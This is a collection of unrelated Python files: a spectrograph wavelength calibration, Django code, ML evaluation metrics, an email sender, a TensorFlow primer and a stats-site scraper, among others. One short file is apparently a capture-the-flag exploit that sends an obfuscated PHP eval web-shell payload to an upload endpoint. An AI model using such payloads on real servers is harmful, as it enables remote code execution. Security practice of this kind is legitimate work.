#Pixels = np.array([1223.5, 1242.5, 1281.5, 1364.5, 1378.5, 1408.5, 1422.5, 1489.5, 1535.5, 1567.5, 1580.5, 1652.5])
# Neon CCD
Pixels = np.loadtxt("Telescope_Neon.txt", usecols = (0,))
#Pixels = np.loadtxt("centroid_for_CCD_Neon1000.txt", usecols = (0,))
#Wavelengths = np.array([5852.49,5881.89,5944.83,6074.34,6096.16,6143.06,6163.59, 6217.28, 6266.49, 6334.43,6382.99,6402.25,6506.53, 6532.88, 6598.95,6678.28, 6717.04, 6929.47,7032.41 ])
#Neon2
#Wavelengths = np.array([5852.49,5881.89,5944.83,6074.34,6096.16,6143.06,6163.59, 6217.28, 6266.49,6334.43,6382.99,6402.25,6506.53, 6532.88, 6598.95,6678.28, 6717.04, 6929.47,7032.41, 7173.94, 7245.17, 7438.90 ])
#Neon1
Wavelengths = np.array([5852.49,5881.89,5944.83,6074.34,6096.16,6143.06,6163.59, 6217.28, 6266.49,6304.79, 6334.43,6382.99,6402.25,6506.53, 6532.88, 6598.95,6678.28, 6717.04, 6929.47,7032.41 ])
ma =np.array([[np.sum(Pixels**2),np.sum(Pixels)],[np.sum(Pixels),len(Pixels)]])
mc =np.array([[np.sum(Pixels*Wavelengths)],[np.sum(Wavelengths)]])
mai = np.linalg.inv(ma)
md = np.dot(mai,mc)
mfit = md[0,0]
cfit = md[1,0]
#mfit = 2.033
#cfit = 3628.99
variance = (1.0/(len(Pixels)-2))*np.sum(Wavelengths-Pixels*mfit-cfit)**2.0
residual = Wavelengths - (mfit*Pixels+cfit)
print mfit,cfit,variance
############## quadratic #################################
x = Pixels
y = Wavelengths
#dy = 0.5
p0 = [2.012, 3645.85, -0.00017]
#fit function
def peval(x, p):
return (p[1]+(p[0]*x)+(p[2]*(x**2)))
def residuals (p,y,x, peval):
return (y) - peval(x,p)
p_final = leastsq(residuals,p0,args=(y,x, peval), full_output= True,maxfev=2000)
y_final = peval(x,p_final[0])
chi2 = np.sum((y - y_final)**2)#/ ((dy)**2))
resi = (residuals(p_final[0],y,x,peval))
dof = len(y)-len(p0)
chi_re2 = chi2/dof # residual variance
cov = p_final[1] * chi_re2
cov_xy = cov[0][1]
cov_x = np.sqrt(cov[0][0])
cov_y = np.sqrt(cov[1][1])
r =cov_xy/(cov_x*cov_y)
print "The inital parameter (p0) we used is:\n", p0
print "What we get as a parameter:", p_final[0]
if p_final[4] == 1: # change p_final[1] to success
print "It converges."
else:
print "It does not converge."
print "The Chi square is: \t\t\t",round(chi2,2)
print "The Chi-reduced square is: \t\t", round(chi_re2,2)
print
print "Cov_xy:",round(cov_xy,4), "\nCov_x: ",round(cov_x,4),"\nCov_y: ", round(cov_y,4)
print "Sample coefficient of linear correlation (r): ", round(r,2)
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~"
print
'''
plt.figure(1)
plt.subplot(2,1,1)
plt.scatter(x,y)
plt.plot(x,peval(x, p_final[0]), color='r',label='fit plot')
'''
plt.figure(1 , figsize=(9,6))
plt.subplot(2,1,1)
plt.plot(Pixels,Wavelengths,'o',label="data")
plt.plot(Pixels,peval(Pixels, p_final[0]), color='r',label='fit plot')
plt.legend(loc=4)
'''
# Night2
plt.text(275, 7300, 'a_1 = 4846.31')
plt.text(275, 7200, 'a_2 = 3.848')
plt.text(275, 7100, 'a_2 = -1.76E(-4))')
plt.text(275, 7000, 'variance = 3.95E(-21)')
'''
#Night 1
plt.text(475, 7000, 'a_0 = 3828.52')
plt.text(475, 6900, 'a_1 = 4.21')
#plt.text(475, 6800, 'a_2 = 4.72E(-5))')
plt.text(475, 6800, 'variance = 3.80E(-20)')
#wavelength = 3828.52 + (4.21*pixel)
'''
#CCD
plt.text(1230, 7000, 'a_0 = 3645.85')
plt.text(1230, 6900, 'a_1 = 2.01')
plt.text(1230, 6800, 'a_2 = -1.76E(-4))')
plt.text(1230, 6700, 'variance = 5.23E(-21)')
'''
#wavelength = 3645.85 + (2.01*pixel) +(-0.000176*(pixel**2))
plt.xlabel("Pixel Number")
plt.ylabel("Wavelength (Angstrom)")
plt.title("Wavelength Fitting for Neon")
#plt.figure(2, figsize=(9,3))
plt.subplot(2,1,2)
plt.scatter (Pixels, residual)
plt.xlabel("Pixel Number")
plt.ylabel("Residual")
plt.title("Linear Residual")
'''
plt.subplot(1,2,2)
plt.scatter (Pixels, resi)
plt.xlabel("Pixel Number")
plt.ylabel("Residual")
plt.title("Quadratic Residual")
'''
plt.tight_layout()
plt.show() |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.14 on 2018-09-10 21:54
from __future__ import unicode_literals
from django.db import migrations
def add_file_types(apps, schema_editor):
FileResource = apps.get_model('tantalus', 'FileResource')
FileType = apps.get_model('tantalus', 'FileType')
file_type_choices = (
'BAM',
'BAI',
'FQ',
)
for name in file_type_choices:
extension = '.' + name.lower()
file_type, _ = FileType.objects.get_or_create(
name=name, extension=extension)
f = FileResource.objects.filter(file_type=name)
f.update(file_type2=file_type)
class Migration(migrations.Migration):
dependencies = [
('tantalus', '0064_auto_20180910_2224'),
]
operations = [
migrations.RunPython(add_file_types),
]
|
import numpy as np
from sklearn import metrics
def find_top_labels(true):
label_count = np.sum(true, axis=0)
idx = np.argsort(label_count)[:: -1]
return idx
def eval_all(L_hat, L, preds, true, idx_to_find, k_list, gen_curve=True):
# P@k
def eval_prec_at_k(k):
acc = 0
for i in range(len(L_hat)):
idx = L_hat[i].argsort()[::-1][: k]
prec = np.sum(np.equal(L_hat[i][idx] > 0 ,np.equal(L[i][idx] > 0 , L_hat[i][idx] > 0))) / k
acc += prec
print('P@{}:'.format(k), acc / len(L_hat))
return acc / len(L_hat)
# Hamming loss
def eval_hamming_loss():
loss = 0
for i in range(len(L_hat)):
loss += metrics.hamming_loss(preds[i], true[i])
print('Hamming_loss:', loss / len(L_hat))
return loss / len(L_hat)
# Jaccard similarity
def eval_jaccard_sim():
acc = 0
for i in range(len(L_hat)):
acc += metrics.jaccard_similarity_score(preds[i], true[i])
print('Jaccard similarity:', acc / len(L_hat))
return acc / len(L_hat)
# Precision, recall, F1 curve
def eval_pre_rec_f1():
num_labs = L.shape[1]
pre_curv = np.zeros(num_labs)
rec_curv = np.zeros(num_labs)
f1_curv = np.zeros(num_labs)
start_idx = 1
if not gen_curve:
start_idx = num_labs
pre_curv = np.zeros(1)
rec_curv = np.zeros(1)
f1_curv = np.zeros(1)
for top_n in range(start_idx, num_labs + 1):
pre, rec, f1, spt = metrics.precision_recall_fscore_support(true[:, idx_to_find[:top_n]], preds[:, idx_to_find[:top_n]])
pre_curv[top_n - start_idx] = np.average(pre, weights=spt)
rec_curv[top_n - start_idx] = np.average(rec, weights=spt)
f1_curv[top_n - start_idx] = np.average(f1, weights=spt)
print('Precision:', pre_curv[-1])
print('Recall:', rec_curv[-1])
print('F1:', f1_curv[-1])
return pre_curv.round(5), rec_curv.round(5), f1_curv.round(5)
ret = []
for k in k_list:
val = eval_prec_at_k(k)
ret.append(val)
h_loss = eval_hamming_loss()
j_sim = eval_jaccard_sim()
pre_c, rec_c, f1_c = eval_pre_rec_f1()
print('-' * 50)
return (ret, h_loss, j_sim, pre_c, rec_c, f1_c) |
class BankAccout:
def __init__(self, account_number, name, password, value, admin):
self.account_number = account_number
self.name = name
self.password = password
self.value = value
self.admin = admin
accounts_list = [
BankAccount('0001-1', 'Dinaerte Neto', '123456', 1000, False),
BankAccount('0001-2', 'Dinaerte Neto', '123456', 1000, False),
BankAccount('0001-3', 'Dinaerte Neto', '123456', 1000, False),
BankAccount('0000-0', 'Administrator', '123456', 1000, True),
] |
from email.mime.text import MIMEText
import smtplib
from email import encoders
from email.header import Header
from email.utils import parseaddr, formataddr
from email.mime.multipart import MIMEMultipart
from email.mime.base import MIMEBase
def _format_addr(s):
name, addr = parseaddr(s)
return formataddr((Header(name, 'utf-8').encode(), addr))
# 输入email地址和口令
from_addr = input('From(QQ邮箱):')
password = input('Password(授权码):')
# 输入收件人地址:
to_addr = input('To:')
# 输入SMTP服务器地址:
smtp_server = input('SMTP server:')
# 邮件正文
msg = MIMEMultipart()
# msg = MIMEText('真不知道说啥', 'plain', 'utf-8') # 发送纯文本
# msg = MIMEText('<html><body><h1>Hello</h1>' +
# '<p>send by <a href="http://www.python.org">Python</a>...</p>' +
# '</body></html>', 'html', 'utf-8') # 发送html
msg['From'] = _format_addr('Python爱好者 <%s>' % from_addr)
msg['To'] = _format_addr('管理员 <%s>' % to_addr)
msg['Subject'] = Header('来自SMTP的问候……', 'utf-8').encode()
# 邮件正文是MIMEText:
msg.attach(MIMEText('send with file...', 'plain', 'utf-8'))
# 添加附件就是加上一个MIMEBase,从本地读取一个图片
with open('C:\\Users\\administrator\Desktop\\QQ20181112103228.png', 'rb') as f:
mime = MIMEBase('image', 'png', filename='QQ20181112103228.png')
mime.add_header('Content-Disposition', 'attachment', filename='QQ20181112103228.png')
mime.add_header('Content-ID', '<0>')
mime.add_header('X-Attachment-Id', '0')
mime.set_payload(f.read())
encoders.encode_base64(mime)
msg.attach(mime)
server = smtplib.SMTP(smtp_server, 25) # SMTP协议默认端口是25
server.set_debuglevel(1)
server.login(from_addr, password)
server.sendmail(from_addr, [to_addr], msg.as_string())
server.quit() |
cards = input().split()
shuffles_count = int(input())
middle_len = len(cards)//2
for _ in range(shuffles_count):
res = []
for index in range(middle_len):
first_card = cards[index]
second_card = cards[index + middle_len]
res.append(first_card)
res.append(second_card)
cards = res
print(res)
|
#!/usr/bin/env python3
import requests
import sys
import urllib
"""
<?;eval(${"\x5f\x47\x45\x54"}[0]);
"""
cmd = '<?;eval(${"\\x5f\\x47\\x45\\x54"}[0]);'
cmd = urllib.parse.quote_plus(cmd)
headers = {
# Note: put your browser user-agent here to have the same behaviour here and in browser
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.97 Safari/537.36',
}
url = 'http://pwnable.org:47780/?action=upload&data=' + cmd
print('URL:', url)
r = requests.get(url, headers=headers)
print('Status Code:', r.status_code)
print('Response:')
print(r.text)
|
def error_handling(func):
def func_wrapper(*args, **kwargs):
try:
return func(*args, **kwargs)
except Exception as ex:
return 'null'
return func_wrapper
@error_handling
def get_title(response, path):
title = response.xpath(path).extract()
return title[0]
@error_handling
def get_content(response,path):
content = response.xpath(path).extract()
content = " ".join(content)
return content
@error_handling
def get_author(response,path):
author = response.xpath(path).extract()
author = ' '.join(author)
return author
@error_handling
def get_tag(response,path):
tag = response.xpath(path).extract()
return tag
|
from rest_framework import serializers
from login_register.models import ContactMessage
class MessageSerializer(serializers.ModelSerializer):
class Meta:
model = ContactMessage
fields = ('id', 'name', 'email', 'message')
read_only_fields = ('id',)
|
# Brief about tensors:
# Its an nd-array
# Has GPU support
# Computational graph / Backpropagation
# immutable
import os
import tensorflow as tf
os.environ["TF_CPP_MIN_LOG_LEVEL"] = "2"
# Rank 1 Tensor
x = tf.constant([1,2,3])
# Rank 2
x = tf.constant([[1,2,3], [4,5,6]])
# Rank 3
x = tf.ones((3,3))
x = tf.zeros((3,3))
x = tf.eye(3) # Diagonals are filled with "1" and others are "0"
# Random tensor
x = tf.random.normal((3,3), mean=0, stddev=1)
# Uniform distribution
x = tf.random.uniform((3,3), minval=0, maxval=1) # there the values are uniformally distributed
# Range tensor
x = tf.range(10)
# Cast tensor (cast datatype for example)
x = tf.cast(x, dtype=tf.float32)
# Opeartions on tensor
x = tf.constant([1,2,3])
y = tf.constant([4,5,6])
# add
z = tf.add(x,y)
# Another way of adding
z = x+y
# Subtraction
z = x-y
# divide
z = x/y
# Multiplication
z = x*y
# Computing dot product (does product of x and y and then add the resultant values)
z = tf.tensordot(x,y, axes=1)
# Element wise exponential product (square root eg.)
z = x ** 2
# Matrix multiplication (number of col in x should match rows in y: simple matrix rule for multiplication)
x = tf.random.normal((2,3))
y = tf.random.normal((3,4))
z = tf.matmul(x,y)
# another way
z = x @ y
# Slicing , indexing (same as numpy or list)
x = tf.constant([[1,2,3,4], [5,6,7,8]]) # 2-d array (2d tensor)
# access only the first row
# print(x[0])
# access all the rows in column 0
# print (x[:, 0])
# Access only row 0 and all columns
# print (x[0, :])
# Access ROW 0 AND COL 1
# print(x[0,1])
# original
x = tf.random.normal((2,3))
# print(x)
# reshaping
x = tf.reshape(x, (3,2)) # for reshaping we need to maintain the original shape order.
# print(x)
x = tf.reshape(x, (6)) # as original (2,3) -> 6 values
# print(x)
# Convert x to numpy array
x = x.numpy()
print(x)
print(type(x)) # <class 'numpy.ndarray'>
# convert back to tensor
x = tf.convert_to_tensor(x)
print(type(x)) # <class 'tensorflow.python.framework.ops.EagerTensor'> this tensor is a eager tensor
# String tensor
x = tf.constant("chandan")
print(x)
# Multi string tensor
x = tf.constant(["chandan", "sanjana"])
print(x)
# Constant tensorflows are immutable, but variable tensors can be changed
x = tf.Variable([1,2,3])
print(x) # <tf.Variable 'Variable:0' shape=(3,) dtype=int32, numpy=array([1, 2, 3], dtype=int32)> |
#define lists much like variables, but use square brackets to input info
friends = ["Kevin", "Karen", "Jim", "Oscar", "Toby"]
# can put strings, numbers, booleans in lists, python is fine with it
print(friends)
#print out specific elements in lists by referring to their index, which starts at 0
print(friends[0])
#can also access elements based on their position from back of list, which start at -1
print(friends[-1])
#can define which section of elements to grab, does NOT grab last number in range
print(friends[1:3])
#can modify elements in list
friends[1] = "Mike"
print(friends[1])
|
#importing current date
from datetime import datetime
#opening user file
user_file = open("user.txt", "r+")
login = False
#while login is false,
#if user enters correct credentials, login
#changes to True. Giving exccess
while login == False:
username = input("Enter your username: ")
password = input("Enter your password: ")
for lines in user_file:
valid_user, valid_password = lines.split(", ")
if valid_user == username and valid_password == password:
login = True
print("Logging in...")
if valid_user != username and valid_password != password:
print("Invalid login details")
user_file.seek(0)
user_file.close()
#choices for the user to choose from
choices = input('''Select option one below:
r - register username
a - add task
va - view all tasks
vm - view my tasks
e - exit
s - stats
gr - general reports
''')
#if user selects admin selects "r" he can
#register a user to user_file
def reg_user():
if username == "admin":
new_userLogin = False
new_usersName = input("Enter username: ")
regstr = open("user.txt", "r+")
v_user, v_password = lines.split(", ")
while new_userLogin == False:
if new_usersName != v_user:
new_userPass = input("Enter password: ")
validate = input("Confirm password: ")
elif new_usersName == v_user:
print("That username is unavailable. Pick another one")
new_usersName = input("Enter username: ")
new_userPass = input("Enter password: ")
validate = input("Confirm password: ")
if new_userPass == validate:
new_userLogin = True
if new_userPass != validate:
print("password did not match. Try again")
if new_userPass == validate:
print("password matches. New user created")
append_me = open("user.txt", "a")
append_me.write("\n" + str(new_usersName) + ", " + str(validate))
append_me.close()
if username != "admin":
print("Only admin can add a new user.")
if choices == "r":
register = reg_user()
print(register)
def add_task():
tasks = open("tasks.txt", "a")
assignee = input("Enter the usersname of assignee: ")
title = input("Enter the title of the task: ")
description = input("Enter task description: ")
due_date = input("Enter task due date: ")
date = datetime.now()
completed = "no"
tasks.write(str(assignee) + ", " + str(title) + ", " + str(description) + ", " + str(due_date)
+ ", " + str(date) + ", " + str(completed) + "\n")
tasks.close
if choices == "a":
adding_task = add_task()
print(adding_task)
#if user selects "va" he will be given info
#of every file in an easy to read format
def view_all():
tasks_file = open("tasks.txt", "r+")
for line in tasks_file:
assignee, title, description, due_date, date, completed = line.split(", ")
print(f'''
Name: {assignee}
Title: {title}
Description: {description}
Due Date: {due_date}
Date Assigned: {date}
Task Complete: {completed}
''')
tasks_file.close()
if choices == "va":
all_view = view_all()
print(all_view)
#if user selects "vm" program
#will desplay specific user task
def view_mine():
view = open("tasks.txt", "r")
task_numb = 0
for line in view:
assignee, title, description, due_date, date, completed = line.split(", ")
if username == assignee:
task_numb += 1
print(f'''
task number: {task_numb}
Name: {assignee}
Title: {title}
Description: {description}
Due Date: {due_date}
Date Assigned: {date}
Task Complete: {completed}
''')
new_task = input("Would you like to edit a task?")
if new_task != "-1":
task_num = input("Please enter the task number: ")
task_file = view.readlines()
view.close()
if choices == "vm":
my_view = view_mine()
print(my_view)
#if the user selects "e" program
#breaks
if choices == "e":
print("closing program...")
breakpoint
#if user selects "s". number of tasks and
#number of users are displayed
if choices == "s":
stats_file = open("tasks.txt", "r+")
other_stats = open("tasks.txt", "r+")
if username == "admin":
num_title = 0
num_assignee = 0
for line in stats_file:
assignee, title, description, due_date, date, completed = line.split(", ")
assignee
num_assignee += 1
print(f'''
Total number of users: {num_assignee}
''')
stats_file.close
for title in other_stats:
assignee, title, description, due_date, date, completed = title.split(", ")
title
num_title += 1
print(f'''
Total number of tasks: {num_title}
''')
other_stats.close()
#if the user select "gr"...
#the progaram writes and prints out the info
if choices == "gr":
task_overview = open("task_overview.txt", "w+")
user_overview = open("user_overview.txt", "w+")
file_overview = open("tasks.txt", "r+")
numOf_tasks = 0
for tasks in file_overview:
assignee, title, description, due_date, date, completed = tasks.split(", ")
description
numOf_tasks += 1
uncompleted_tasks = 0
if completed == "no":
uncompleted_tasks += 1
completed_tasks = 0
if completed == "yes":
completed_tasks += 1
|
from django.test import TestCase
import datetime
from myuw.dao.category_links import _get_links_by_category_and_campus, \
_get_category_id
class TestCategoryLinks(TestCase):
def test_get_by_category_id(self):
category_id = _get_category_id("Student & Campus Life")
self.assertEquals(category_id, "studentcampuslife")
links = _get_links_by_category_and_campus(category_id, "seattle")
self.assertEquals(len(links), 24)
links = _get_links_by_category_and_campus(category_id, "bothell")
self.assertEquals(len(links), 23)
links = _get_links_by_category_and_campus(category_id, "tacoma")
self.assertEquals(len(links), 22)
|
from django.shortcuts import render
# Create your views here.
from django.db import connections
from django.db.models import Count
from django.http import JsonResponse
from django.shortcuts import render
from .models import Censo
from django.db import connection
import os
import ujson
import pandas as pd
from .CrearJSON import *
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
file_dir = BASE_DIR + "\\static\\json\\"
GEOJSON_Directory = file_dir + "GeoJson\\"
def graph(request):
return render(request, 'graph/graph.html')
def INFO_Ubicacion(request):
"""
Funcion para buscar entre los directorios los archivos que cumplen con los filtros pasados desde el Front End.
:param request: Contiene la ubicacion y filtro.
:return: Un JSON con los datos del censo pertenecientes a ese filtro y los datos geograficos.
"""
data = None
ubicacion = request.GET.get('ubicacion')
filtro = request.GET.get('filtro')
file = ""
geofile = ""
if ubicacion != 'Region':
file = file_dir + ubicacion + "\\Get_Info_" + ubicacion + filtro + ".json"
geofile = GEOJSON_Directory + ubicacion + "\\GeoJson" + filtro + ".geojson"
else:
file = file_dir + "Get_Info_Region.json"
geofile = GEOJSON_Directory + "regioncenso2010.geojson"
censo_data = None
with open(file) as f:
censo_data = ujson.loads(f.read())
geo_data = None
with open(geofile) as f:
geo_data = ujson.loads(f.read())
data = dict(Censo=censo_data,
Geo=geo_data)
return JsonResponse(data, safe=False)
def INFO_Provincias(request):
if not os.path.isfile(file_dir + "Get_Info_Region.json"):
Crear_Archivos_JSON()
if not os.path.isfile(GEOJSON_Directory + "regioncenso2010.geojson"):
Crear_GeoJSON()
#Convierte la lista en un JSON para un API.
censo_data = None
with open(file_dir + "Get_Info_Region.json") as f:
censo_data = ujson.loads(f.read())
geo_data = None
with open(GEOJSON_Directory + "regioncenso2010.geojson") as f:
geo_data = ujson.loads(f.read())
data = dict( Censo = censo_data,
Geo = geo_data)
return JsonResponse(data, safe=False) |
import sys
CONSTANTS = ['ZERO', 'ONE', 'TWO', 'THREE', 'FOUR', 'FIVE', 'SIX', 'SEVEN',
'EIGHT', 'NINE']
result_list = []
def remove_word(S, word):
N = min(S.count(i) for i in word)
for i in range(N, -1, -1):
if i == 0:
yield (S, i)
SS = S
for j in word:
SS = SS.replace(j, '', i)
yield (SS, i)
def _get_digits(S, i):
global result_list
if i == 10:
return False
for S1, count in remove_word(S, CONSTANTS[i]):
if not S1:
result_list[i] = count
return True
if _get_digits(S1, i + 1):
result_list[i] = count
return True
return False
def get_digits(S):
global result_list
result_list = [0] * 10
_get_digits(S, 0)
result = ''
for i, count in enumerate(result_list):
result += str(i) * count
return result
lines = open(sys.argv[1]).readlines()[1:]
for i, S in enumerate(lines):
result = get_digits(S.strip())
print('Case #{}: {}'.format(i + 1, result))
|
import unittest
import liron.models # @UnusedImport
from liron.models.constants import VEGETARIAN, MEAT, MALE, FEMALE
from liron.models.persons import Educative, Madrich
from liron.models.seminar import Seminar, Camp, Hug, Ken, SecondKen
from liron.sort.default_constraints import VegetarianHardConstraint, \
MadrichHardConstraint, GenderRandomSoftConstraint, SizeRandomSoftConstraint, \
KenRandomSoftConstraint
class TestConstraints(unittest.TestCase):
@classmethod
def setUpClass(cls):
from liron.models import session, engine, Base
cls.session = session
Base.metadata.create_all(engine)
@classmethod
def tearDown(cls):
cls.session.rollback()
def create_seminar(self, num_of_camps, num_of_hugs):
seminar = Seminar()
seminar.name = 'Seminar'
self.session.add(seminar)
for i in xrange(num_of_camps):
camp = Camp()
camp.name = 'Camp ' + str(i)
camp.seminar = seminar
self.session.add(camp)
for i in xrange(num_of_hugs):
hug = Hug()
hug.name = 'Hug ' + str(i)
hug.camp = seminar.camps[i % num_of_camps]
self.session.add(hug)
self.session.flush()
return seminar
def test_vegetarian(self):
aviad = Educative()
aviad.first_name = 'Aviad'
aviad.food = VEGETARIAN
self.session.add(aviad)
seminar = self.create_seminar(1, 1)
hug = seminar.camps[0].hugs[0]
hug.food = MEAT
aviad.hug = hug
constraint = VegetarianHardConstraint()
self.assertTrue(not constraint.is_valid(aviad, [aviad], [hug]))
def test_madrich(self):
ken = Ken()
ken.name = 'Misgav'
seminar = self.create_seminar(1, 1)
hug = seminar.camps[0].hugs[0]
aviad = Educative()
aviad.first_name = 'Aviad'
aviad.ken = ken
aviad.hug = hug
madrich = Madrich()
madrich.first_name = 'Cool'
madrich.last_name = 'Guy'
madrich.ken = ken
madrich.hug = hug
constraint = MadrichHardConstraint()
self.assertTrue(not constraint.is_valid(aviad, [aviad], seminar))
def test_gender_constant(self):
constraint = GenderRandomSoftConstraint(10, 10, 10)
seminar = self.create_seminar(1, 2)
hugs = seminar.camps[0].hugs
educative1 = Educative()
educative1.gender = MALE
educative1.hug = hugs[0]
educative2 = Educative()
educative2.gender = FEMALE
educative2.hug = hugs[0]
educative3 = Educative()
educative3.gender = FEMALE
educative3.hug = hugs[1]
score = constraint.calculate_score([educative1, educative2, educative3], seminar)
self.assertEquals(score, 30)
def test_size_constant(self):
constraint = SizeRandomSoftConstraint(10, 10, 10)
seminar = self.create_seminar(1, 2)
hugs = seminar.camps[0].hugs
educative1 = Educative()
educative1.hug = hugs[0]
educative2 = Educative()
educative2.hug = hugs[0]
educative3 = Educative()
educative3.hug = hugs[1]
score = constraint.calculate_score([educative1, educative2, educative3], seminar)
self.assertEquals(score, 50)
def test_ken_constant(self):
constraint = KenRandomSoftConstraint(10, 10, 10)
seminar = self.create_seminar(1, 2)
hugs = seminar.camps[0].hugs
ken1 = Ken()
ken1.name = "A"
ken2 = Ken()
ken2.name = "B"
second_ken = SecondKen()
second_ken.name = "c"
self.session.add(ken1)
self.session.add(ken2)
self.session.add(second_ken)
educative1 = Educative()
educative1.ken = ken1
educative1.hug = hugs[0]
self.session.add(educative1)
educative2 = Educative()
educative2.ken = ken1
educative2.hug = hugs[0]
self.session.add(educative2)
educative3 = Educative()
educative3.ken = ken1
educative3.hug = hugs[1]
self.session.add(educative3)
educative4 = Educative()
educative4.ken = ken2
educative4.second_ken = second_ken
educative4.hug = hugs[1]
self.session.add(educative4)
score = constraint.calculate_score([educative1, educative2, educative3, educative4], seminar)
self.assertEquals(score, 70)
if __name__ == '__main__':
unittest.main() |
"""A Class to facilitate continual reading and averaging of
Labjack Analog inputs.
"""
import time
import threading
import traceback
import sys
import numpy as np
class AnalogChannel:
"""One analog channel and its associated ring buffer.
"""
def __init__(self, lj_device, channel_number, long_settle=True, ring_buffer_size=20):
"""Parameters:
lj_device: The Labjack device object to read from, like a U3protected.
channel_number: Channel number of the analog input.
long_settle: If True use Long Settle mode of reading channel.
ring_buffer_size: Number of elements to include in the ring buffer array.
"""
self.lj_device = lj_device
self.channel_number = channel_number
self.long_settle = long_settle
self.ring_buffer_size = ring_buffer_size
self.ring_buffer = np.zeros(ring_buffer_size)
self.first_read = True # indicates no readings have occurred yet.
self.ix = 0 # next index in ring buffer to fill out
def read(self):
"""Reads the input and updates the ring buffer. Returns the read value.
"""
val = self.lj_device.get_analog(self.channel_number, self.long_settle)
# if this is the first read, fill entire buffer with this value so a
# sensible average will be computed
if self.first_read:
self.ring_buffer[:] = val
self.first_read = False
else:
self.ring_buffer[self.ix] = val
# update ring buffer index, wrapping around if necessary
self.ix = (self.ix + 1) % self.ring_buffer_size
return val
def value(self):
"""Returns the average value of the ring buffer.
"""
return self.ring_buffer.mean()
class AnalogReader(threading.Thread):
"""Manages reading a set of Analog channels and returning a set of current
average values from the readings.
"""
def __init__(self, lj_device, channel_list, read_spacing=4.0, ring_buffer_size=20):
"""Parameters:
lj_device: Labjack device object such as U3protected or one with a similar interface.
channel_list: List of channels to read. Each channel is described by a two-tuple:
(channel number, long settle boolean). If long settle is True, then the
channel will be read on the Labjack with Long Settle = True to allow for a
higher source impedance.
A sample list of channels would be:
[
(14, True), # channel 14, read with Long Settle
(16, False) # channel 16, normal read length
]
read_spacing: The number milliseconds of sleep in between Analog readings. This
allows for other threads to access the Labjack device in between analog
readings.
ring_buffer_size: The number of readings to hold in a ring buffer for each channel.
This ring buffer will be averaged to provide the final reading value of the channel.
A larger ring buffer suppresses noise better but increases the response time of the
returned channel value.
Long Settle readings of analog channels on the Labjack U3 take about 4 milliseconds and
allow for a source impendance of 200 K-ohms on the U3-LV.
Normal readings take 0.7 milliseconds, but limit source impedance to 1OK on the U3-LV.
For the U3-HV, the source impedance must always be 1 K-ohm or less.
"""
# daemon thread so shuts down when program ends
threading.Thread.__init__(self, daemon=True)
self.channel_list = channel_list
# Make a list of AnalogChannel objects
self.channel_objects = [
AnalogChannel(lj_device, ch, ls, ring_buffer_size) for ch, ls in channel_list
]
self.read_spacing = read_spacing
self.ring_buffer_size = ring_buffer_size
def run(self):
"""Runs when the thread is started. Starts the continual reading process.
"""
# continually read analog inputs with a sleep gap between reads
while True:
for ch in self.channel_objects:
try:
ch.read()
except:
traceback.print_exc(file=sys.stdout)
finally:
time.sleep(self.read_spacing / 1000.)
def values(self):
"""Returns a dictionary of current channel values, keyed on channel number.
Each current value is the average of the ring buffer for the channel.
"""
values = {}
for ch in self.channel_objects:
try:
values[ch.channel_number] = ch.value()
except:
traceback.print_exc(file=sys.stdout)
return values
|
datamapper = {
"stats": {
"hp": "hp",
"hpperlevel": "hp_lvl",
"mp": "mana",
"mpperlevel": "mana_lvl",
"movespeed": "ms",
"armor": "armor",
"armorperlevel": "armor_lvl",
"spellblock": "mr",
"spellblockperlevel": "mr_lvl",
"attackrange": "range",
"hpregen": "hpregen",
"hpregenperlevel": "hpregen_lvl",
"mpregen": "mregen",
"mpregenperlevel": "mregen_lvl",
"attackdamage": "ad",
"attackdamageperlevel": "ad_lvl",
"attackspeed": "as",
"attackspeedperlevel": "as_lvl",
},
"tags": [
"attribute",
"attribute2"
],
"partype": "resource",
"title": "title"
}
|
# @Time : 2021/4/116:54
# @Author : 周云鹏
# @File : area.PY
import requests
import lxml.html
import pandas as pd
# data 获取所有的省市县
data = []
base_url = 'http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2020/'
headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/89.0.4389.90 Safari/537.36'}
province_urls_responses = requests.get(base_url + 'index.html', headers=headers)
province_urls_responses.encoding = 'gb2312'
province_urls_etree = lxml.html.etree.HTML(province_urls_responses.text)
province_urls = province_urls_etree.xpath('//tr[@class="provincetr"]/td/a/@href')
provinces = province_urls_etree.xpath('//tr[@class="provincetr"]/td/a/text()')
data += provinces # 添加省数据
# 爬取省下地级市
for i in province_urls:
city_url = base_url + i
city_responses = requests.get(city_url, headers=headers)
city_responses.encoding = 'gb2312'
county_urls_etree = lxml.html.etree.HTML(city_responses.text)
# print(city_responses.text)
county_urls = county_urls_etree.xpath("//tr[@class='citytr']/td[2]/a/@href")
cities = county_urls_etree.xpath("//tr[@class='citytr']/td[2]/a/text()")
# print(cities)
data += cities # 添加市数据
# 爬出地级市下县区
for j in county_urls:
county_url = base_url + j
county_responses = requests.get(county_url, headers=headers)
county_responses.encoding = 'gb2312'
r_urls_etree = lxml.html.etree.HTML(county_responses.text)
# county_urls = r_urls_etree.xpath("//tr[@class='citytr']/td[2]/a/@href")
county = r_urls_etree.xpath("//tr[@class='countytr']/td[2]/a/text()")
print(f'正在爬取{county}')
data += county
pd.DataFrame(columns=['area'], data=data).to_csv('area.csv')
|
from django.contrib import admin
from vutman.models import EmailDomain, EmailServer, EmailUser, EmailAlias
from simple_history.admin import SimpleHistoryAdmin
admin.site.register(EmailDomain, SimpleHistoryAdmin)
admin.site.register(EmailServer, SimpleHistoryAdmin)
admin.site.register(EmailUser, SimpleHistoryAdmin)
admin.site.register(EmailAlias, SimpleHistoryAdmin)
|
# user.py
from library import Base
###### 1.
# user code used some function defined in libray, here `foo`
# to avoid crash before exectute this function, we can check if method exist using `hasattr`
##
# assert hasattr(Base, 'foo'), "foo doesn't exist in base class"
# class Derived(Base):
# def bar(self):
# return self.foo()
###### 2.
##
class Derived(Base):
def bar(self):
return 'bar'
|
from django.shortcuts import render
from django.http import HttpResponse
from main.models import Item, ToDoList, Transportation
# Create your views here.
def index(response, name):
ls = ToDoList.objects.get(name=name)
items = ls.item_set.all()
items = ", ".join(item.text for item in items)
